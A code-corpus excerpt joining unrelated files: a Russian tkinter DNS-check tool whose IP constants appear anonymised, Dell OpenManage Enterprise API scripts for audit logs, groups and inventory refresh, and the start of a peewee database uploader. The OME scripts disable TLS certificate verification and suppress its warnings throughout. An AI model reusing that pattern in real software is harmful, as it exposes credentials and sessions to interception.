if len(xx)==1:
url=xx[0]
else:
url=xx[1]
for x in range(0,8,2):
resolver = dns.resolver.Resolver(configure=False)
resolver.nameservers = [ip[x],ip[x+1]]
try:
dr=resolver.query(url)[0].to_text()
if (dr=="172.16.58.3" or dr=="192.168.127.12" or dr=="172.16.17.32" or dr=="172.16.17.32"
or dr=="192.168.127.12" or dr=="192.168.127.12"):
rez[1]=rez[1]+1
elif (dr=="172.16.17.32" or dr=="172.16.58.3" or dr=="192.168.3.11" or dr== "192.168.127.12"
or dr=="172.16.31.10" or dr=="172.16.31.10" or dr=="172.16.58.3" or dr=="192.168.3.11"
or dr=="192.168.127.12" or dr=="192.168.127.12"):
rez[0]=rez[0]+1
else:
rez[2]=rez[2]+1
except:
rez[3]=rez[3]+1
if rez[0]>0:
rezz="red"
elif rez[1] >0:
rezz="yellow"
elif rez[2] >0:
rezz="green"
else:
rezz="black"
fr0.configure(bg=rezz)
app=Tk()
app.title(chr(9816)*7+" NetLights версия 0.5 бета "+chr(169)+" 2017, программирование 5n6r "+chr(9816)*7)
app.geometry("700x60")
app.resizable(0,0)
ii=StringVar()
ii.set("")
fr0=Frame(app,bd=2,height=12,relief="groove",bg="silver")
fr0.pack(padx=10,pady=10)
e=Entry(fr0,textvariable=ii,bd=1,cursor="spider",width=30)
e.focus()
e.grid(row=0,column=0,pady=5,padx=5)
b1=Button(fr0,text="Проверить!",cursor="hand2")
b1.grid(row=0,column=1,padx=3,pady=3)
b2=Button(fr0,text="Новая проверка",command=cl,cursor="hand2")
b2.grid(row=0,column=2,padx=3,pady=3)
b2=Button(fr0,text="Выход из программы",command=app.destroy,cursor="hand2")
b2.grid(row=0,column=3,padx=3,pady=3)
e.bind("<Button-3>",mous)
e.bind("<Return>",checker)
b1.bind("<Button-1>",checker)
app.mainloop()
``` |
{
"source": "5nafu/OpenManage-Enterprise",
"score": 2
} |
#### File: Core/Python/get_audit_logs.py
```python
import argparse
import csv
import json
import sys
from argparse import RawTextHelpFormatter
from pprint import pprint
from urllib.parse import urlparse
try:
import urllib3
import requests
import smbclient
except ModuleNotFoundError:
print("This program requires urllib3, requests, smbprotocol, and gssapi. To install them on most systems run "
"`pip install requests urllib3 smbprotocol[kerberos]`")
sys.exit(0)
try:
from gssapi.raw import inquire_sec_context_by_oid
except ImportError as error:
print("-----WARNING-----")
print("python-gssapi extension is not available. You need to install it with `pip install gssapi`: %s" % str(error))
print("You will also need a Kerberos installation. See https://pypi.org/project/smbprotocol/ for details.")
print("You can ignore this if you do not plan on using Kerberos for authentication.")
print("-----------------")
except OSError as error:
print("Encountered an OS error. This usually means you are missing kerberos dependencies. The error was:",
str(error))
sys.exit(0)
def authenticate(ome_ip_address: str, ome_username: str, ome_password: str) -> dict:
"""
Authenticates with OME and creates a session
Args:
ome_ip_address: IP address of the OME server
ome_username: Username for OME
ome_password: OME password
Returns: A dictionary of HTTP headers
Raises:
Exception: A generic exception in the event of a failure to connect.
"""
authenticated_headers = {'content-type': 'application/json'}
session_url = 'https://%s/api/SessionService/Sessions' % ome_ip_address
user_details = {'UserName': ome_username,
'Password': <PASSWORD>,
'SessionType': 'API'}
session_info = requests.post(session_url, verify=False,
data=json.dumps(user_details),
headers=authenticated_headers)
if session_info.status_code == 201:
authenticated_headers['X-Auth-Token'] = session_info.headers['X-Auth-Token']
return authenticated_headers
print("There was a problem authenticating with OME. Are you sure you have the right username, password, "
"and IP?")
raise Exception("There was a problem authenticating with OME. Are you sure you have the right username, "
"password, and IP?")
def get_data(authenticated_headers: dict, url: str, odata_filter: str = None, max_pages: int = None) -> list:
"""
This function retrieves data from a specified URL. Get requests from OME return paginated data. The code below
handles pagination. This is the equivalent in the UI of a list of results that require you to go to different
pages to get a complete listing.
Args:
authenticated_headers: A dictionary of HTTP headers generated from an authenticated session with OME
url: The API url against which you would like to make a request
odata_filter: An optional parameter for providing an odata filter to run against the API endpoint.
max_pages: The maximum number of pages you would like to return
Returns: Returns a list of dictionaries of the data received from OME
"""
next_link_url = None
if odata_filter:
count_data = requests.get(url + '?$filter=' + odata_filter, headers=authenticated_headers, verify=False)
if count_data.status_code == 400:
print("Received an error while retrieving data from %s:" % url + '?$filter=' + odata_filter)
pprint(count_data.json()['error'])
return []
count_data = count_data.json()
if count_data['@odata.count'] <= 0:
print("No results found!")
return []
else:
count_data = requests.get(url, headers=authenticated_headers, verify=False).json()
if 'value' in count_data:
data = count_data['value']
else:
data = count_data
if '@odata.nextLink' in count_data:
# Grab the base URI
next_link_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(url)) + count_data['@odata.nextLink']
i = 1
while next_link_url is not None:
# Break if we have reached the maximum number of pages to be returned
if max_pages:
if i >= max_pages:
break
else:
i = i + 1
response = requests.get(next_link_url, headers=authenticated_headers, verify=False)
next_link_url = None
if response.status_code == 200:
requested_data = response.json()
if requested_data['@odata.count'] <= 0:
print("No results found!")
return []
# The @odata.nextLink key is only present in data if there are additional pages. We check for it and if it
# is present we get a link to the page with the next set of results.
if '@odata.nextLink' in requested_data:
next_link_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(url)) + \
requested_data['@odata.nextLink']
if 'value' in requested_data:
data += requested_data['value']
else:
data += requested_data
else:
print("Unknown error occurred. Received HTTP response code: " + str(response.status_code) +
" with error: " + response.text)
raise Exception("Unknown error occurred. Received HTTP response code: " + str(response.status_code)
+ " with error: " + response.text)
return data
if __name__ == '__main__':
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument("--ip", "-i", required=True, help="OME Appliance IP")
parser.add_argument("--user", "-u", required=False, help="Username for the OME Appliance", default="admin")
parser.add_argument("--password", "-p", required=True, help="Password for the OME Appliance")
parser.add_argument("--share", "-s", required=False,
help="A path to the share which you want to in format "
"\\\\<ip_address>\\<share_name>\\<file_name>")
parser.add_argument("--smbuser", "-su", required=False, help="The username for SMB")
parser.add_argument("--smbpass", "-sp", required=False, help="Password for SMB")
args = parser.parse_args()
try:
headers = authenticate(args.ip, args.user, args.password)
if not headers:
sys.exit(0)
audit_logs = get_data(headers, "https://%s/api/ApplicationService/AuditLogs" % args.ip)
if args.share:
if not args.smbuser or not args.smbpass:
print("You must provide the arguments --smbuser and --smbpass when connecting to a share.")
sys.exit(0)
with smbclient.open_file(args.share, username=args.smbuser, password=args.smbpass, mode='w',
encoding='utf-8-sig', newline='') as smbfile:
csv_columns = ["Severity", "Message", "Category", "UserName", "IpAddress", "MessageArgs", "MessageID",
"CreatedDate"]
writer = csv.DictWriter(smbfile, fieldnames=csv_columns, extrasaction='ignore')
writer.writeheader()
for row in audit_logs:
writer.writerow(row)
else:
pprint(audit_logs)
except Exception as error:
print("Unexpected error:", str(error))
```
#### File: Core/Python/get_group_details_by_filter.py
```python
import argparse
import json
from argparse import RawTextHelpFormatter
import requests
import urllib3
def get_group_details(ip_address, user_name, password, filter_by, field):
""" Get Group Details using OData filters """
try:
base_uri = 'https://%s' % ip_address
sess_url = base_uri + '/api/SessionService/Sessions'
base_grp = base_uri + "/api/GroupService/Groups"
grp_url = base_grp + "?$filter=%s eq '%s'" % (filter_by, field)
next_link_url = None
headers = {'content-type': 'application/json'}
user_details = {'UserName': user_name,
'Password': password,
'SessionType': 'API'}
sess_info = requests.post(sess_url, verify=False,
data=json.dumps(user_details),
headers=headers)
if sess_info.status_code == 201:
headers['X-Auth-Token'] = sess_info.headers['X-Auth-Token']
response = requests.get(grp_url, headers=headers, verify=False)
if response.status_code == 200:
json_data = response.json()
if json_data['@odata.count'] > 0:
print("*** Group Details ***")
print(json.dumps(json_data, indent=4, sort_keys=True))
# Technically there should be only one result in the filter
group_id = json_data['value'][0]['Id']
print("\n*** Group Device Details ***")
dev_url = base_grp + "(" + str(group_id) + ")/Devices"
dev_resp = requests.get(dev_url, headers=headers,
verify=False)
if dev_resp.status_code == 200:
print(json.dumps(dev_resp.json(), indent=4,
sort_keys=True))
device_list = dev_resp.json()
device_count = device_list['@odata.count']
if device_count > 0:
if '@odata.nextLink' in device_list:
next_link_url = base_uri + device_list['@odata.nextLink']
while next_link_url:
next_link_response = requests.get(next_link_url, headers=headers, verify=False)
if next_link_response.status_code == 200:
next_link_json_data = next_link_response.json()
device_list['value'] += next_link_json_data['value']
if '@odata.nextLink' in next_link_json_data:
next_link_url = base_uri + next_link_json_data['@odata.nextLink']
else:
next_link_url = None
else:
print("Unable to get full device list ... ")
next_link_url = None
else:
print("Unable to retrieve devices for group (%s) from %s" % (field, ip_address))
else:
print("No group matching field (%s) retrieved from %s" % (field, ip_address))
else:
print("No group data retrieved from %s" % ip_address)
else:
print("Unable to create a session with appliance %s" % ip_address)
except Exception as error:
print("Unexpected error:", str(error))
if __name__ == '__main__':
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument("--ip", "-i", required=True, help="OME Appliance IP")
parser.add_argument("--user", "-u", required=True,
help="Username for OME Appliance",
default="admin")
parser.add_argument("--password", "-p", required=True,
help="Password for OME Appliance")
parser.add_argument("--filterby", "-fby", required=True,
choices=('Name', 'Description'),
help="filter by group name or description")
parser.add_argument("--field", "-f", required=True,
help="Field to filter by (group name or description)")
args = parser.parse_args()
get_group_details(args.ip, args.user, args.password,
str(args.filterby), str(args.field))
```
#### File: Core/Python/get_group_details.py
```python
import argparse
import json
from argparse import RawTextHelpFormatter
import requests
import urllib3
def get_group_details(ip_address, user_name, password, group_info):
""" List out group details based on id/name/description """
try:
base_uri = 'https://%s' % ip_address
session_url = base_uri + '/api/SessionService/Sessions'
group_url = base_uri + '/api/GroupService/Groups'
next_link_url = None
headers = {'content-type': 'application/json'}
user_details = {'UserName': user_name,
'Password': password,
'SessionType': 'API'}
session_info = requests.post(session_url, verify=False,
data=json.dumps(user_details),
headers=headers)
if session_info.status_code == 201:
headers['X-Auth-Token'] = session_info.headers['X-Auth-Token']
response = requests.get(group_url, headers=headers, verify=False)
if response.status_code == 200:
group_list = response.json()
group_count = group_list['@odata.count']
if group_count > 0:
found_group = False
if '@odata.nextLink' in group_list:
next_link_url = base_uri + group_list['@odata.nextLink']
while next_link_url:
next_link_response = requests.get(next_link_url, headers=headers, verify=False)
if next_link_response.status_code == 200:
next_link_json_data = next_link_response.json()
group_list['value'] += next_link_json_data['value']
if '@odata.nextLink' in next_link_json_data:
next_link_url = base_uri + next_link_json_data['@odata.nextLink']
else:
next_link_url = None
else:
print("Unable to get full group list ... ")
next_link_url = None
for group in group_list['value']:
if ((str(group['Id']).lower() == group_info.lower()) or
str(group['Name']).lower() == group_info.lower() or
str(group['Description']).lower() ==
group_info.lower()):
found_group = True
print("*** Group Details ***")
print(json.dumps(group, indent=4, sort_keys=True))
dev_url = group_url + "(" + str(group['Id']) + ")/Devices"
dev_response = requests.get(dev_url,
headers=headers,
verify=False)
if dev_response.status_code == 200:
device_list = dev_response.json()
device_count = device_list['@odata.count']
if device_count > 0:
if '@odata.nextLink' in device_list:
next_link_url = base_uri + device_list['@odata.nextLink']
while next_link_url:
next_link_response = requests.get(next_link_url, headers=headers, verify=False)
if next_link_response.status_code == 200:
next_link_json_data = next_link_response.json()
device_list['value'] += next_link_json_data['value']
if '@odata.nextLink' in next_link_json_data:
next_link_url = base_uri + next_link_json_data['@odata.nextLink']
else:
next_link_url = None
else:
print("Unable to get full device list ... ")
next_link_url = None
print("\n*** Group Device Details ***")
print(json.dumps(device_list, indent=4,
sort_keys=True))
else:
print("Unable to get devices for (%s)" % group_info)
break
if not found_group:
print("No group matching (%s) found" % group_info)
else:
print("No group data retrieved from %s" % ip_address)
else:
print("Unable to retrieve group list from %s" % ip_address)
else:
print("Unable to create a session with appliance %s" % ip_address)
except Exception as error:
print("Unexpected error:", str(error))
if __name__ == '__main__':
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument("--ip", "-i", required=True, help="OME Appliance IP")
parser.add_argument("--user", "-u", required=True,
help="Username for OME Appliance",
default="admin")
parser.add_argument("--password", "-p", required=True,
help="Password for OME Appliance")
parser.add_argument("--groupinfo", "-g", required=True,
help="Group id/Name/Description - case insensitive")
args = parser.parse_args()
get_group_details(args.ip, args.user, args.password, str(args.groupinfo))
```
#### File: Core/Python/invoke_refresh_inventory.py
```python
import argparse
import json
import sys
import time
from argparse import RawTextHelpFormatter
from pprint import pprint
from typing import List
from urllib.parse import urlparse
try:
import urllib3
import requests
except ModuleNotFoundError:
print("This program requires urllib3 and requests. To install them on most systems run `pip install requests"
"urllib3`")
sys.exit(0)
def authenticate(ome_ip_address: str, ome_username: str, ome_password: str) -> dict:
"""
Authenticates with OME and creates a session
Args:
ome_ip_address: IP address of the OME server
ome_username: Username for OME
ome_password: OME password
Returns: A dictionary of HTTP headers
Raises:
Exception: A generic exception in the event of a failure to connect.
"""
authenticated_headers = {'content-type': 'application/json'}
session_url = 'https://%s/api/SessionService/Sessions' % ome_ip_address
user_details = {'UserName': ome_username,
'Password': <PASSWORD>,
'SessionType': 'API'}
session_info = requests.post(session_url, verify=False,
data=json.dumps(user_details),
headers=authenticated_headers)
if session_info.status_code == 201:
authenticated_headers['X-Auth-Token'] = session_info.headers['X-Auth-Token']
return authenticated_headers
print("There was a problem authenticating with OME. Are you sure you have the right username, password, "
"and IP?")
raise Exception("There was a problem authenticating with OME. Are you sure you have the right username, "
"password, and IP?")
def get_group_id_by_name(ome_ip_address: str, group_name: str, authenticated_headers: dict) -> int:
"""
Retrieves the ID of a group given its name.
Args:
ome_ip_address: The IP address of the OME server
group_name: The name of the group whose ID you want to resolve.
authenticated_headers: Headers used for authentication to the OME server
Returns: Returns the ID of the group as an integer or -1 if it couldn't be found.
"""
print("Searching for the requested group.")
groups_url = "https://%s/api/GroupService/Groups?$filter=Name eq '%s'" % (ome_ip_address, group_name)
group_response = requests.get(groups_url, headers=authenticated_headers, verify=False)
if group_response.status_code == 200:
json_data = json.loads(group_response.content)
if json_data['@odata.count'] > 1:
print("WARNING: We found more than one name that matched the group name: " + group_name +
". We are picking the first entry.")
if json_data['@odata.count'] == 1 or json_data['@odata.count'] > 1:
group_id = json_data['value'][0]['Id']
if not isinstance(group_id, int):
print("The server did not return an integer ID. Something went wrong.")
return -1
return group_id
print("Error: We could not find the group " + group_name + ". Exiting.")
return -1
print("Unable to retrieve groups. Exiting.")
return -1
def get_data(authenticated_headers: dict, url: str, odata_filter: str = None, max_pages: int = None) -> list:
"""
This function retrieves data from a specified URL. Get requests from OME return paginated data. The code below
handles pagination. This is the equivalent in the UI of a list of results that require you to go to different
pages to get a complete listing.
Args:
authenticated_headers: A dictionary of HTTP headers generated from an authenticated session with OME
url: The API url against which you would like to make a request
odata_filter: An optional parameter for providing an odata filter to run against the API endpoint.
max_pages: The maximum number of pages you would like to return
Returns: Returns a list of dictionaries of the data received from OME
"""
next_link_url = None
if odata_filter:
count_data = requests.get(url + '?$filter=' + odata_filter, headers=authenticated_headers, verify=False)
if count_data.status_code == 400:
print("Received an error while retrieving data from %s:" % url + '?$filter=' + odata_filter)
pprint(count_data.json()['error'])
return []
count_data = count_data.json()
if count_data['@odata.count'] <= 0:
print("No results found!")
return []
else:
count_data = requests.get(url, headers=authenticated_headers, verify=False).json()
if 'value' in count_data:
data = count_data['value']
else:
data = count_data
if '@odata.nextLink' in count_data:
# Grab the base URI
next_link_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(url)) + count_data['@odata.nextLink']
i = 1
while next_link_url is not None:
# Break if we have reached the maximum number of pages to be returned
if max_pages:
if i >= max_pages:
break
else:
i = i + 1
response = requests.get(next_link_url, headers=authenticated_headers, verify=False)
next_link_url = None
if response.status_code == 200:
requested_data = response.json()
if requested_data['@odata.count'] <= 0:
print("No results found!")
return []
# The @odata.nextLink key is only present in data if there are additional pages. We check for it and if it
# is present we get a link to the page with the next set of results.
if '@odata.nextLink' in requested_data:
next_link_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(url)) + \
requested_data['@odata.nextLink']
if 'value' in requested_data:
data += requested_data['value']
else:
data += requested_data
else:
print("Unknown error occurred. Received HTTP response code: " + str(response.status_code) +
" with error: " + response.text)
raise Exception("Unknown error occurred. Received HTTP response code: " + str(response.status_code)
+ " with error: " + response.text)
return data
def track_job_to_completion(ome_ip_address: str,
authenticated_headers: dict,
tracked_job_id,
max_retries: int = 20,
sleep_interval: int = 30) -> bool:
"""
Tracks a job to either completion or a failure within the job.
Args:
ome_ip_address: The IP address of the OME server
authenticated_headers: A dictionary of HTTP headers generated from an authenticated session with OME
tracked_job_id: The ID of the job which you would like to track
max_retries: The maximum number of times the function should contact the server to see if the job has completed
sleep_interval: The frequency with which the function should check the server for job completion
Returns: True if the job completed successfully or completed with errors. Returns false if the job failed.
"""
job_status_map = {
"2020": "Scheduled",
"2030": "Queued",
"2040": "Starting",
"2050": "Running",
"2060": "Completed",
"2070": "Failed",
"2090": "Warning",
"2080": "New",
"2100": "Aborted",
"2101": "Paused",
"2102": "Stopped",
"2103": "Canceled"
}
failed_job_status = [2070, 2090, 2100, 2101, 2102, 2103]
job_url = 'https://%s/api/JobService/Jobs(%s)' % (ome_ip_address, tracked_job_id)
loop_ctr = 0
job_incomplete = True
print("Polling %s to completion ..." % tracked_job_id)
while loop_ctr < max_retries:
loop_ctr += 1
time.sleep(sleep_interval)
job_resp = requests.get(job_url, headers=authenticated_headers, verify=False)
if job_resp.status_code == 200:
job_status = str((job_resp.json())['LastRunStatus']['Id'])
job_status_str = job_status_map[job_status]
print("Iteration %s: Status of %s is %s" % (loop_ctr, tracked_job_id, job_status_str))
if int(job_status) == 2060:
job_incomplete = False
print("Job completed successfully!")
break
elif int(job_status) in failed_job_status:
job_incomplete = True
if job_status_str == "Warning":
print("Completed with errors")
else:
print("Error: Job failed.")
job_hist_url = str(job_url) + "/ExecutionHistories"
job_hist_resp = requests.get(job_hist_url, headers=authenticated_headers, verify=False)
if job_hist_resp.status_code == 200:
# Get the job's execution details
job_history_id = str((job_hist_resp.json())['value'][0]['Id'])
execution_hist_detail = "(" + job_history_id + ")/ExecutionHistoryDetails"
job_hist_det_url = str(job_hist_url) + execution_hist_detail
job_hist_det_resp = requests.get(job_hist_det_url,
headers=authenticated_headers,
verify=False)
if job_hist_det_resp.status_code == 200:
pprint(job_hist_det_resp.json()['value'])
else:
print("Unable to parse job execution history... exiting")
break
else:
print("Unable to poll status of %s - Iteration %s " % (tracked_job_id, loop_ctr))
if job_incomplete:
print("Job %s incomplete after polling %s times...Check status" % (tracked_job_id, max_retries))
return False
return True
def get_device_id(authenticated_headers: dict,
ome_ip_address: str,
service_tag: str = None,
device_idrac_ip: str = None,
device_name: str = None) -> int:
"""
Resolves a service tag, idrac IP or device name to a device ID
Args:
authenticated_headers: A dictionary of HTTP headers generated from an authenticated session with OME
ome_ip_address: IP address of the OME server
service_tag: (optional) The service tag of a host
device_idrac_ip: (optional) The idrac IP of a host
device_name: (optional): The name of a host
Returns: Returns the device ID or -1 if it couldn't be found
"""
if not service_tag and not device_idrac_ip and not device_name:
print("No argument provided to get_device_id. Must provide service tag, device idrac IP or device name.")
return -1
# If the user passed a device name, resolve that name to a device ID
if device_name:
device_id = get_data(authenticated_headers, "https://%s/api/DeviceService/Devices" % ome_ip_address,
"DeviceName eq \'%s\'" % device_name)
if len(device_id) == 0:
print("Error: We were unable to find device name " + device_name + " on this OME server. Exiting.")
return -1
device_id = device_id[0]['Id']
elif service_tag:
device_id = get_data(authenticated_headers, "https://%s/api/DeviceService/Devices" % ome_ip_address,
"DeviceServiceTag eq \'%s\'" % service_tag)
if len(device_id) == 0:
print("Error: We were unable to find service tag " + service_tag + " on this OME server. Exiting.")
return -1
device_id = device_id[0]['Id']
elif device_idrac_ip:
device_id = -1
device_ids = get_data(authenticated_headers, "https://%s/api/DeviceService/Devices" % ome_ip_address,
"DeviceManagement/any(d:d/NetworkAddress eq '%s')" % device_idrac_ip)
if len(device_ids) == 0:
print("Error: We were unable to find idrac IP " + device_idrac_ip + " on this OME server. Exiting.")
return -1
# TODO - This is necessary because the filter above could possibly return mulitple results
# TODO - See https://github.com/dell/OpenManage-Enterprise/issues/87
for device_id in device_ids:
if device_id['DeviceManagement'][0]['NetworkAddress'] == device_idrac_ip:
device_id = device_id['Id']
if device_id == -1:
print("Error: We were unable to find idrac IP " + device_idrac_ip + " on this OME server. Exiting.")
return -1
else:
device_id = -1
return device_id
def refresh_device_inventory(authenticated_headers: dict,
ome_ip_address: str,
group_name: str,
skip_config_inventory: bool,
device_ids: list = None,
service_tags: str = None,
device_idrac_ips: str = None,
device_names: str = None,
ignore_group: bool = False):
"""
Refresh the inventory of targeted hosts
Args:
authenticated_headers: A dictionary of HTTP headers generated from an authenticated session with OME
ome_ip_address: IP address of the OME server
group_name: The name of the group which contains the servers whose inventories you want to refresh
skip_config_inventory: A boolean defining whether you would like to skip gathering the config inventory
device_ids: (optional) The device ID of a host whose inventory you want to refresh
service_tags: (optional) The service tag of a host whose inventory you want to refresh
device_idrac_ips: (optional) The idrac IP of a host whose inventory you want to refresh
device_names: (optional): The name of a host whose inventory you want to refresh
ignore_group: (optional): Controls whether you want to ignore using groups or not
"""
jobs_url = "https://%s/api/JobService/Jobs" % ome_ip_address
target_ids = []
if service_tags:
service_tags = service_tags.split(',')
for service_tag in service_tags:
target = get_device_id(headers, ome_ip_address, service_tag=service_tag)
if target != -1:
target_ids.append(target)
else:
print("Could not resolve ID for: " + service_tag)
if device_idrac_ips:
device_idrac_ips = args.idrac_ips.split(',')
for device_idrac_ip in device_idrac_ips:
target = get_device_id(headers, ome_ip_address, device_idrac_ip=device_idrac_ip)
if target != -1:
target_ids.append(target)
else:
print("Could not resolve ID for: " + device_idrac_ip)
if device_names:
device_names = device_names.split(',')
for device_name in device_names:
target = get_device_id(headers, ome_ip_address, device_name=device_name)
if target != -1:
target_ids.append(target)
else:
print("Could not resolve ID for: " + device_name)
if device_ids:
for device_id in device_ids:
target_ids.append(device_id)
if not skip_config_inventory:
group_id = get_group_id_by_name(ome_ip_address, group_name, authenticated_headers)
if group_id == -1:
print("We were unable to find the ID for group name " + group_name + " ... exiting.")
sys.exit(0)
if not ignore_group:
group_devices = get_data(headers, "https://%s/api/GroupService/Groups(%s)/Devices" % (ome_ip_address, group_id))
if len(group_devices) < 1:
print("Error: There was a problem retrieving the devices for group " + args.groupname + ". Exiting")
sys.exit(0)
for device in group_devices:
target_ids.append(device['Id'])
targets_payload = []
for id_to_refresh in target_ids:
targets_payload.append({
"Id": id_to_refresh,
"Data": "",
"TargetType": {
"Id": 1000,
"Name": "DEVICE"
}
})
payload = {
"Id": 0,
"JobName": "Inventory refresh via the API.",
"JobDescription": "Refreshes the inventories for targeted hardware.",
"Schedule": "startnow",
"State": "Enabled",
"JobType": {
"Name": "Inventory_Task"
},
"Targets": targets_payload
}
print("Beginning standard inventory refresh...")
create_resp = requests.post(jobs_url, headers=authenticated_headers, verify=False, data=json.dumps(payload))
if create_resp.status_code == 201:
job_id_generic_refresh = json.loads(create_resp.content)["Id"]
else:
print("Error: Failed to refresh inventory. We aren't sure what went wrong.")
sys.exit(1)
if job_id_generic_refresh is None:
print("Received invalid job ID from OME for standard inventory. Exiting.")
sys.exit(1)
# ------------------------------------------------------
if not skip_config_inventory:
payload = {
"JobDescription": "Run config inventory collection task on selected devices",
"JobName": "Part 1 - API refresh config inventory",
"JobType": {"Id": 50, "Name": "Device_Config_Task"},
"Params": [{"Key": "action", "Value": "CONFIG_INVENTORY"}],
"Schedule": "startnow",
"StartTime": "",
"State": "Enabled",
"Targets": [{
"Data": "",
"Id": group_id,
"JobId": -1,
"TargetType": {"Id": 6000, "Name": "GROUP"}
}]
}
print("Beginning part 1 of 2 of the configuration inventory refresh.")
create_resp = requests.post(jobs_url, headers=authenticated_headers, verify=False, data=json.dumps(payload))
if create_resp.status_code == 201:
config_inventory_refresh_job_1 = json.loads(create_resp.content)["Id"]
else:
print("Error: Failed to refresh inventory. We aren't sure what went wrong.")
sys.exit(1)
if config_inventory_refresh_job_1 is None:
print("Received invalid job ID from OME for part 1 of configuration inventory refresh... exiting.")
sys.exit(1)
print("Waiting for part 1 of configuration inventory refresh to finish. This could take a couple of minutes.")
if track_job_to_completion(ome_ip_address, authenticated_headers, config_inventory_refresh_job_1):
print("Part 1 of configuration inventory refresh completed successfully.")
else:
print("Something went wrong. See text output above for more details.")
# ------------------------------------------------------
payload = {
"JobDescription": "Create Inventory",
"JobName": "Part 2 - API refresh config inventory",
"JobType": {"Id": 8, "Name": "Inventory_Task"},
"Params": [
{"Key": "action", "Value": "CONFIG_INVENTORY"},
{"Key": "isCollectDriverInventory", "Value": "true"}],
"Schedule": "startnow",
"StartTime": "",
"State": "Enabled",
"Targets": [{
"Data": "",
"Id": group_id,
"JobId": -1,
"TargetType": {"Id": 6000, "Name": "GROUP"}
}]
}
print("Beginning part 2 of 2 of the configuration inventory refresh")
create_resp = requests.post(jobs_url, headers=authenticated_headers, verify=False, data=json.dumps(payload))
if create_resp.status_code == 201:
config_inventory_refresh_job_2 = json.loads(create_resp.content)["Id"]
else:
print("Error: Failed to refresh inventory. We aren't sure what went wrong.")
sys.exit(1)
if config_inventory_refresh_job_2 is None:
print("Received invalid job ID from OME for part 2 of the configuration inventory refresh... exiting.")
sys.exit(1)
print("Waiting for part 2 of the configuration inventory refresh to finish. "
"This could take a couple of minutes.")
if track_job_to_completion(ome_ip_address, authenticated_headers, config_inventory_refresh_job_2):
print("Inventory refresh completed successfully.")
else:
print("Something went wrong. See text output above for more details.")
print("Tracking standard inventory to completion.")
if track_job_to_completion(ome_ip_address, authenticated_headers, job_id_generic_refresh):
print("Inventory refresh completed successfully.")
else:
print("Something went wrong. See text output above for more details.")
print("Inventory refresh complete!")
if __name__ == '__main__':
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument("--ip", "-i", required=True, help="OME Appliance IP")
parser.add_argument("--user", "-u", required=False,
help="Username for the OME Appliance", default="admin")
parser.add_argument("--password", "-p", required=True,
help="Password for the OME Appliance")
parser.add_argument("--groupname", "-g", required=False, default="All Devices",
help="The name of the group containing the devices whose inventory you want to refresh. "
"Defaults to all devices. Due to the way the API functions, if you want to refresh the "
"configuration inventory, you must have all applicable devices in a group. The "
"configuration inventory is specific to the tab called \"Configuration Inventory\" under "
"a device's view. You can use the create_static_group and add_device_to_static group "
"modules to do this programmatically.")
parser.add_argument("--device-ids", "-d", help="A comma separated list of device-ids to refresh. Applies to "
"regular inventory only. This does not impact the configuration "
"inventory tab. That is controlled by the group name.")
parser.add_argument("--service-tags", "-s", help="A comma separated list of service tags to refresh. Applies to "
"regular inventory only. This does not impact the configuration "
"inventory tab. That is controlled by the group name.")
parser.add_argument("--idrac-ips", "-r", help="A comma separated list of idrac IPs to refresh. Applies to regular "
"inventory only. This does not impact the configuration inventory "
"tab. That is controlled by the group name.")
parser.add_argument("--device-names", "-n", help="A comma separated list of device names to refresh. Applies to "
"regular inventory only. This does not impact the configuration "
"inventory tab. That is controlled by the group name.")
parser.add_argument("--skip-config-inventory", "-skip", default=False, action='store_true',
help="The configuration inventory is the inventory you see specifically under the tab for a"
" specific device. In order to obtain a config inventory that server must be part of a"
" group or you have to run an inventory update against all devices which can be time "
"consuming. A regular inventory run will update things like firmware assuming that the"
" version change is reflected in idrac. A config inventory is launched in the GUI by "
"clicking \"Run inventory\" on quick links on the devices page. A regular inventory is "
"the same as clicking \"Run inventory\" on a specific device\'s page.")
parser.add_argument("--ignore-group", default=False, action='store_true', help="Used when you only want to run a"
" regular inventory and you do not want to provide a group.")
args = parser.parse_args()
try:
headers = authenticate(args.ip, args.user, args.password)
if not headers:
sys.exit(0)
if args.device_ids:
device_ids_arg = args.device_ids.split(',')
else:
device_ids_arg = None
if args.service_tags:
service_tags_arg = args.service_tags.split(',')
else:
service_tags_arg = None
if args.idrac_ips:
idrac_ips_arg = args.idrac_ips.split(',')
else:
idrac_ips_arg = None
if args.device_names:
device_names_arg = args.device_names.split(',')
else:
device_names_arg = None
print("WARNING: To reflect firmware changes you may have to power cycle the server first before running this. "
"It is situation dependent.")
if args.groupname == 'All Devices':
print("WARNING: No argument was provided for groupname. Defaulting to \'All Devices\' for the "
"inventory refresh. See help for details. This will also display if the argument was manually set "
"to \'All Devices\' and can be safely ignored. If you do not want to use a group AND you do not want"
" to update the configuration inventory tab, use the --skip-config-inventory and --ignore-group"
" switches together. If you want to use a group to update regular inventories only and not the"
" configuration inventory tab use the --skip-config-inventory switch by itself.")
refresh_device_inventory(headers, args.ip, args.groupname, args.skip_config_inventory, device_ids_arg,
service_tags_arg, idrac_ips_arg, device_names_arg, args.ignore_group)
except Exception as error:
print("Unexpected error:", str(error))
``` |
{
"source": "5nizza/bene",
"score": 2
} |
#### File: 5nizza/bene/data_uploader.py
```python
import logging
from typing import Iterable
from adhoc_fields import adhoc_fields
from field_desc import FieldDesc
from structs import ExpDesc, TimedRunParams, ToolRunParams, RunResult
from peewee import *
from config import DB_HOST, DB_USER, DB_PASSWD, DB_DBNAME
from utils import readfile
# taken from:
# http://peewee.readthedocs.org/en/latest/peewee/example.html#example-app
database = MySQLDatabase(host=DB_HOST,
user=DB_USER,
passwd=<PASSWORD>,
database=DB_DBNAME)
# database = SqliteDatabase('tests.db')
class BaseModel(Model): # BaseModel is only used to specify the database
class Meta:
database = database
class RunRecord(BaseModel):
""" Note: see the end of this module -- this class is updated with fields from adhoc_fields """
